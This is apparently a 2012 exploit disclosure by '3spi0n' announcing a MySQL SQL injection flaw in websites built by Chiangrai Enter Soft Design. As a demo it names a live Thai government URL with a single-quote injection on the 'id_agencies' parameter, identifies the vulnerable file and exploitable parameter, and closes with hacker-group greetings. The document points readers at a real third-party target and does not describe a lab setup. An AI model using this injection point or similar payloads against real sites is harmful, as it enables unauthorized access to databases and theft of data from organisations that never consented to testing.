# Exploit Title; Chiangrai Enter Soft Design SQL Injection Vulnerability
# Date ; 28/6/12
# Author ; 3spi0n
# Script Vendor or Software Link ; http://www.chiangraientersoft.com/
# Category ; Webapps
# Type ; SQL Injection [MySQLi]
# Tested on ; Ubuntu / Win7 / Backtrack

[#] Demo Analyzing ;

http://www.pakordum.go.th/general/general_member.php?id_agencies=13'
[MySQLi Vuln.]

[#] Vulnerable Details ;

- MySQLi Vulnerable on sites

Vulnerable File ; general_member.php?query= [query, variant of index.php
file]

Exploit ; general_member.php?id_agencies=

[#] Greetz ;

- Grayhatz Corporation
- My Official Blog, www.Ryuzaki.in
- Facebook.Com/3spi0ne - Twitter.Com/RigidusCO